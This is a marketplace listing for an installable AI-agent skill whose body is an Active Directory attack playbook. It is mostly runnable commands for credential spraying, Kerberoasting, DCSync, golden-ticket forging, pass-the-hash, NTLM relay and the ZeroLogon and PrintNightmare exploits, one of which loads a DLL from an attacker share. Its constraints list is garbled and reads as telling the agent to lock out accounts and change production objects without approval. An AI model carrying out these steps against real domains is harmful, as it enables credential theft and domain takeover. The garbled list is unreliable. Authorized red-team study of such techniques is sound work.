Find the right AI skills faster.
Apiara © 2026
active-directory-attacks | Apiara Skills
Home / Explore / active-directory-attacks Skill
active-directory-attacks "Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing."
$ npx clawhub@latest install active-directory-attacksOverview > AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
# Active Directory Attacks
Purpose Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
Inputs/Prerequisites Kali Linux or Windows attack platform Domain user credentials (for most attacks) Network access to Domain Controller Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec Outputs/Deliverables Domain enumeration data Extracted credentials and hashes Kerberos tickets for impersonation Domain Administrator access Persistent access mechanisms ---
Essential Tools | Tool | Purpose |
|------|---------|
| BloodHound | AD attack path visualization |
| Impacket | Python AD attack tools |
| Mimikatz | Credential extraction |
| Rubeus | Kerberos attacks |
| CrackMapExec | Network exploitation |
| PowerView | AD enumeration |
| Responder | LLMNR/NBT-NS poisoning |
---
Core Workflow
Step 1: Kerberos Clock Sync Kerberos requires clock synchronization (±5 minutes):
nmap -sT 10.10.10.10 -p445 --script smb2-time
sudo date -s "14 APR 2024 18:25:16"
# Fake clock without changing system time
faketime -f '+8h' <command>
Step 2: AD Reconnaissance with BloodHound # Collect data with SharpHound
.\SharpHound.exe -c All --ldapusername user --ldappassword pass
# Python collector (from Linux)
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
Step 3: PowerView Enumeration Get-NetUser -SamAccountName targetuser
Get-UserProperty -Properties pwdlastset
Get-NetGroupMember -GroupName "Domain Admins"
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
# Find local admin access
Find-LocalAdminAccess -Verbose
Invoke-UserHunter -Stealth
Credential Attacks
Password Spraying ./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
Kerberoasting Extract service account TGS tickets and crack offline:
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
.\Rubeus.exe kerberoast /outfile:hashes.txt
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
hashcat -m 13100 hashes.txt rockyou.txt
AS-REP Roasting Target accounts with "Do not require Kerberos preauthentication":
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
hashcat -m 18200 hashes.txt rockyou.txt
DCSync Attack Extract credentials directly from DC (requires Replicating Directory Changes rights):
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:Administrator
Kerberos Ticket Attacks
Pass-the-Ticket (Golden Ticket) Forge TGT with krbtgt hash for any user:
# Get krbtgt hash via DCSync first
# Mimikatz - Create Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
Silver Ticket Forge TGS for specific service:
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
Pass-the-Hash psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
OverPass-the-Hash Convert NTLM hash to Kerberos ticket:
getTGT.py domain.local/user -hashes :NTHASH
export KRB5CCNAME=user.ccache
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
NTLM Relay Attacks
Responder + ntlmrelayx # Start Responder (disable SMB/HTTP for relay)
ntlmrelayx.py -tf targets.txt -smb2support
# LDAP relay for delegation attack
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
SMB Signing Check crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
Certificate Services Attacks (AD CS)
ESC1 - Misconfigured Templates # Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
# Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
ESC8 - Web Enrollment Relay ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Critical CVEs
ZeroLogon (CVE-2020-1472) crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
python3 cve-2020-1472-exploit.py DC01 10.10.10.10
secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
# Restore password (important!)
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
PrintNightmare (CVE-2021-1675) # Check for vulnerability
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
# Exploit (requires hosting malicious DLL)
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
samAccountName Spoofing (CVE-2021-42278/42287) python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
Quick Reference | Attack | Tool | Command |
|--------|------|---------|
| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |
Constraints Synchronize time with DC before Kerberos attacks Have valid domain credentials for most attacks Document all compromised accounts Lock out accounts with excessive password spraying Modify production AD objects without approval Leave Golden Tickets without documentation Run BloodHound for attack path discovery Check for SMB signing before relay attacks Verify patch levels for CVE exploitation
Examples
Example 1: Domain Compromise via Kerberoasting # 1. Find service accounts with SPNs
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
hashcat -m 13100 tgs.txt rockyou.txt
# 4. Use cracked service account
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
Example 2: NTLM Relay to LDAP # 1. Start relay targeting LDAP
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
# 2. Trigger authentication (e.g., via PrinterBug)
python3 printerbug.py domain.local/user:pass@target 10.10.10.12
# 3. Use created machine account for RBCD attack
Troubleshooting | Clock skew too great | Sync time with DC or use faketime |
| Kerberoasting returns empty | No service accounts with SPNs |
| DCSync access denied | Need Replicating Directory Changes rights |
| NTLM relay fails | Check SMB signing, try LDAP target |
| BloodHound empty | Verify collector ran with correct creds |
Additional Resources For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).
When to Use This skill is applicable to execute the workflow or actions described in the overview.